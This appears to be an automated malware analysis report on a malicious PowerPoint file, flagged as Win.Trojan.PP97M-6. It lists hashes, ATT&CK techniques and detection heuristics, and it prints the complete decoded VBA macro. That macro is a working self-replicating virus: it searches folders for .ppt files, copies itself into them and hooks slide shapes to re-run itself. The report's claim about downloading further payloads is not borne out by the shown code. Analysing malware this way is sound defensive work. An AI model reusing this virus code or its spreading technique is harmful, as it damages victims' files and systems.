Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 5bf87297d8d5ea89…

MALICIOUS

Office (OLE)

24.0 KB Created: 1999-01-03 05:25:24 Authoring application: Microsoft PowerPoint First seen: 2012-06-14
MD5: 39442160dff1bc8ce8497dde8cac03cb SHA-1: a6e86685b76b0f1555f5334acfc1010c4e347777 SHA-256: 5bf87297d8d5ea89f01d4f2cc6a23d89493d7e228eabbad026bf0d5bfcb17e70
180 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1203 Exploitation for Client Execution

The file is identified as malicious by ClamAV with the signature Win.Trojan.PP97M-6. Static analysis revealed the presence of VBA macros, including a CreateObject call, indicating potential malicious activity. The VBA script appears to be designed to search for and potentially infect other PowerPoint files, and the `actionhook` subroutine suggests an attempt to execute further stages, likely involving downloading and running additional payloads.

Heuristics 3

  • ClamAV: Win.Trojan.PP97M-6 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Win.Trojan.PP97M-6
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 3756 bytes
SHA-256: c7023f5c041bf2cfc0d9a103a7e4cf1403fdce763e17d1f8ac7c0de72e35303d
Detection
ClamAV: Win.Trojan.PP97M-6
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ShapeShift"
'<!--1nternal-->
'PPT.ShapeShift v0.1 /1nternal
Private Home
Sub actionhook(Stealth)
    On Error Resume Next
    Set LastSlide = ActivePresentation.Slides(ActivePresentation.Slides.Count)
    Set Home = ActivePresentation
    If ActivePresentation.SlideShowWindow.View.Slide.SlideIndex = LastSlide.SlideIndex Then
        For Each InfPresentation In Presentations
            Call WackPresentation(InfPresentation)
        Next
        Set fs = Application.FileSearch
        fs.NewSearch
        fs.LookIn = ActivePresentation.Path
        fs.SearchSubFolders = True
        fs.FileName = "*.ppt"
        fs.Execute
        For Each target In fs.FoundFiles
            If InStr(1, target, "~", 1) = 0 Then
                dontadd = False
                Set PowerObj = CreateObject("PowerPoint.Application")
                PowerObj.Visible = False
                Set PVict = PowerObj.Presentations.Open(target)
                For i = 1 To Presentations.Count - 1
                    If Presentations(i).FullName = PVict.FullName Then dontadd = True
                Next
                If dontadd <> True Then Call WackPresentation(PVict)
                PVict.Close
                Set PVict = Nothing
            End If
        Next
    Else
        If Int(Rnd * 10) = 0 Then
            Call RandomWackSlide(ActivePresentation)
            For Each ShapetoWack In LastSlide.Shapes
                If ShapetoWack.Name = "hookme" Then ShapetoWack.Delete
            Next
            Call SlideIn(LastSlide)
            If Int(Rnd * 10) = 0 Then MsgBox ("PPT.ShapeShift v0.1 /1nternal")
        End If
    End If
    ActivePresentation.SlideShowWindow.View.Next
End Sub
Sub SlideIn(SlideW)
    On Error Resume Next
    dontadd = False
    For Each ShapetoWack In SlideW.Shapes
        If ShapetoWack.Name = "hookme" Then dontadd = True
    Next
    If dontadd <> True Then
        Set ShapetoWack = SlideW.Shapes.AddShape(Int(Rnd * 140) + 1, 0, 0, SlideW.Parent.PageSetup.SlideWidth, SlideW.Parent.PageSetup.SlideHeight)
        ShapetoWack.Name = "hookme"
        ShapetoWack.ZOrder (msoSendToBack)
        ShapetoWack.Line.Visible = False
        ShapetoWack.Fill.Visible = False
        Call WackShape(ShapetoWack)
    End If
    For Each ShapetoWack In SlideW.Shapes
        Call WackShape(ShapetoWack)
    Next
End Sub
Sub WackShape(ShapetoWack)
    On Error Resume Next
    If ShapetoWack.ActionSettings(ppMouseClick).Action = 0 Then
        ShapetoWack.ActionSettings(ppMouseClick).Action = ppActionRunMacro
        ShapetoWack.ActionSettings(ppMouseClick).Run = "actionhook"
    End If
End Sub
Sub RandomWackSlide(PresW)
    On Error Resume Next
    Set SlidetoWack = PresW.Slides(Int(Rnd * PresW.Slides.Count) + 1)
    Call WackShape(SlidetoWack.Shapes(Int(Rnd * SlidetoWack.Shapes.Count) + 1))
End Sub
Sub WackPresentation(InfPresentation)
    On Error Resume Next
    dontadd = False
    For Each ModComponent In InfPresentation.VBProject.VBComponents
        If ModComponent.Name = "ShapeShift" Then dontadd = True
    Next
    If dontadd <> True Then
        Set Slider = InfPresentation.Slides(InfPresentation.Slides.Count)
        Set NewMod = InfPresentation.VBProject.VBComponents.Add(1)
        NewMod.Name = "ShapeShift"
        NewMod.CodeModule.InsertLines 1, Home.VBProject.VBComponents("ShapeShift").CodeModule.Lines(1, Home.VBProject.VBComponents("ShapeShift").CodeModule.CountOfLines)
        Call SlideIn(Slider)
        Call RandomWackSlide(InfPresentation)
        Call RandomWackSlide(InfPresentation)
        Call RandomWackSlide(InfPresentation)
        InfPresentation.Save
    End If
End Sub